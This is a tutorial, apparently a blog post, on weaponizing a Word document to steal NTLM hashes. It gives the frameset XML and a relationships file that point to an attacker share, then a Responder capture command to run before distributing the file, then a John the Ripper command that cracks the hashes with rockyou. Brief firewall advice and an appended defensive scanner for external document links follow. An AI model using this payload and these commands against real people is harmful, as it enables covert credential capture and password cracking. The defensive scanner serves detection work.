Office or Web Page to Steal NTLM Password Hashes

We've covered stealing NTLM password hashes here by allowing Windows to broadcast when connecting to a non-existent share or during name resolution of WPAD. Disabling LLMNR via GPO and creating a WPAD DNS record prevents this attack with Responder.

It's easy to prevent the broadcasting of credentials; direct harvesting is a little more difficult to overcome. In this example Word 2019 will be used. PDF, RTF, Excel, PowerPoint and websites can all be leveraged to steal NTLM hashes.

Create a new Word document and add some content to create metadata.

You will need 7-Zip or WinRAR to 'Open with'.

CD to 'Word'.

Copy webSettings.xml to the Desktop.

Open webSettings.xml with Notepad and enable 'Word Wrap'.

In between 'w16e w16cid' and '<w:optimize...' paste the following.

    <w:frameset>
      <w:framesetSplitbar>
        <w:w w:val="60"/>
        <w:color w:val="auto"/>
        <w:noBorder/>
      </w:framesetSplitbar>
      <w:frameset>
        <w:frame>
          <w:name w:val="3"/>
          <w:sourceFileName r:id="rId1"/>
          <w:linkedToFile/>
        </w:frame>
      </w:frameset>
    </w:frameset>


Create a new file named 'webSettings.xml.rels'.

Paste the following and update the IP to that of Kali.

 

    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
      <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\10.1.1.100\Office Add-ins" TargetMode="External"/>
    </Relationships>

Copy 'webSettings.xml' from the Desktop and replace the original version within WinRAR.

CD to '_rels'.

Copy 'webSettings.xml.rels' into the folder.

Close WinRAR.

Prior to distributing, log on to Kali, open a Terminal window and type 'responder -I eth0 -wFv'.

To test, open the Word document.

The giveaway is that Word is clearly trying to contact the Share.

 

Note: If Kali is not available then Word hangs whilst waiting for Kali to respond.

The user tries to authenticate to a non-existent share and their password hash is passed to Responder.

Responder logs all its activity; browse or cd to /usr/share/responder/logs.

The wordlists are stored at /usr/share/wordlists, and 'rockyou.txt' is the wordlist of choice today.

Run the following 'John' command.

john /usr/share/responder/SMB-NTLMv2-SSP-10.1.1.107.txt --wordlist:/usr/share/wordlists/rockyou.txt

If you're lucky and the user has a known simple password, it will be cracked in no time. There are alternatives to rockyou, and far newer and much larger wordlists are available via a Google search.

The same can be achieved by connecting to a website, despite the WPAD DNS record being in place. It's just a matter of tricking the user into connecting.

Now this is going to be a challenge, as this is standard behavior for Windows when connecting to a share or website. AV, AppLocker and in many cases firewalls won't prevent these types of attacks, especially over port 80 and 443 traffic. The edge firewalls shouldn't allow outbound SMB traffic on 445, and the client firewalls should name the IPs for any internal SMB shares. As for web traffic I'm not sure there is a fix.
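A defender-side check for the document technique above, added here as an example and not part of the original post: it scans every relationships part of an Office package for external targets that load when the file is opened. The function names and the constructed sample package are assumptions made for illustration; the UNC target is the one used on this page.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

PKG = "http://schemas.openxmlformats.org/package/2006/relationships"
DOC = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

def risk(rel_type, target):
    """Return a reason string if an external target is loaded on open, else None."""
    t = target.strip().lower()
    if t.startswith(("\\\\", "//", "file:")):
        return "UNC/file target: opening the document starts an SMB/NTLM logon"
    # Assumption: hyperlink targets load only on click; other part types auto-load.
    if t.startswith(("http:", "https:")) and not rel_type.endswith("/hyperlink"):
        return "auto-loaded web target"
    return None

def scan_docx(data):
    """Scan all .rels parts of an OOXML package; return (part, type, target, reason)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for part in pkg.namelist():
            if not part.lower().endswith(".rels"):
                continue
            try:
                root = ET.fromstring(pkg.read(part))
            except ET.ParseError:
                findings.append((part, "", "", "unparseable relationships part"))
                continue
            for rel in root.iter("{%s}Relationship" % PKG):
                if rel.get("TargetMode", "").lower() != "external":
                    continue
                rtype, target = rel.get("Type", ""), rel.get("Target", "")
                reason = risk(rtype, target)
                if reason:
                    findings.append((part, rtype.rsplit("/", 1)[-1], target, reason))
    return findings

def build_sample():
    """Constructed test package: the page's frame relationship plus a benign hyperlink."""
    rels = '<Relationships xmlns="%s">%%s</Relationships>' % PKG
    rel = '<Relationship Id="%s" Type="' + DOC + '/%s" Target="%s" TargetMode="External"/>'
    frame = rel % ("rId1", "frame", "\\\\10.1.1.100\\Office Add-ins")
    link = rel % ("rId2", "hyperlink", "https://example.com/")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/webSettings.xml.rels", rels % frame)
        z.writestr("word/_rels/document.xml.rels", rels % link)
    return buf.getvalue()
```

Call `scan_docx(open(path, "rb").read())` on attachments at the mail gateway or on upload; for files from untrusted senders, swap the standard-library XML parser for a hardened one such as defusedxml.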